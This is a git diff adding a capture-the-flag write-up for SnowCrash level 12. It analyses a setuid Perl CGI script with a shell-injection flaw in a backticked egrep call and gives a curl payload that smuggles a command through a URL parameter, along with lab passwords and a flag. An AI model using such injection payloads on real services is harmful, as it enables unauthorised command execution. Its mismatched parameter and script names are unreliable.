diff --git a/levels/12/README.md b/levels/12/README.md new file mode 100644 index 0000000..2ea1d15 --- /dev/null +++ b/levels/12/README.md @@ -0,0 +1,117 @@ +# Level 12 + +## how to login + +username: level12 + +password: fa6v5ateaw21peobuub8ipe6s + +## Goal + +run `getflag` as user `flag12` + +## Actually doing something + +```bash +level12@SnowCrash:~$ ll +total 16 +dr-xr-x---+ 1 level12 level12 120 Mar 5 2016 ./ +d--x--x--x 1 root users 340 Aug 30 2015 ../ +-r-x------ 1 level12 level12 220 Apr 3 2012 .bash_logout* +-r-x------ 1 level12 level12 3518 Aug 30 2015 .bashrc* +-rwsr-sr-x+ 1 flag12 level12 464 Mar 5 2016 level12.pl* +-r-x------ 1 level12 level12 675 Apr 3 2012 .profile* +``` + +Perl again... + +```perl +level12@SnowCrash:~$ cat level12.pl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $nn = $_[1]; + $xx = $_[0]; + $xx =~ tr/a-z/A-Z/; + $xx =~ s/\s.*//; + @output = `egrep "^$xx" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $nn) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); +``` +a bit more involed, lets try to make it more pretty + +```perl +#!/usr/bin/env perl +# localhost:4646 +use CGI qw{param}; +print "Content-type: text/html\n\n"; + +sub t { + $arg2 = $_[1]; + $arg1 = $_[0]; + $arg1 =~ tr/a-z/A-Z/; + $arg1 =~ s/\s.*//; + @output = `egrep "^$arg1" /tmp/xd 2>&1`; + foreach $line (@output) { + ($f, $s) = split(/:/, $line); + if($s =~ $arg2) { + return 1; + } + } + return 0; +} + +sub n { + if($_[0] == 1) { + print(".."); + } else { + print("."); + } +} + +n(t(param("x"), param("y"))); +``` + +when looking at this, we basically spot an `egrep` meaning that we have a shell injection. + +lets look at what is given to this string + +first of all, we get called with two argument, lets call them by their http parameter names `x` and `y` + +in the script they are also named `arg1` for `x` and `arg2` for `y` + +arg2 doesn't matter for us, so lets ignore it + +arg1 is converted to uppercase, and then we only keep erverything up to the first space; + +so we want to execute something like last time, meaning that we want to instert something to stop the current comment +`";cmdhere` + +but the issue is that we need to have a command in uppercase (because everuthing gets convert to uppercase), however the only directory we can write to is `/tmp` which is in lowercase... + +Alas this doesnt matter since we are in shell land, and we can say `/*/GETOK` to refer to the `/tmp/GETOK` script + +```bash +level12@SnowCrash:~$ curl "localhost:4646?y=%22%3B/*/GETTOK%3B%22" && cat /tmp/flag +..Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr +``` + diff --git a/levels/12/flag b/levels/12/flag new file mode 100644 index 0000000..29e9492 --- /dev/null +++ b/levels/12/flag @@ -0,0 +1 @@ +g1qKMiRpXf53AWhDaU7FEkczr diff --git a/levels/12/passwd b/levels/12/passwd new file mode 100644 index 0000000..54ea557 --- /dev/null +++ b/levels/12/passwd @@ -0,0 +1 @@ +fa6v5ateaw21peobuub8ipe6s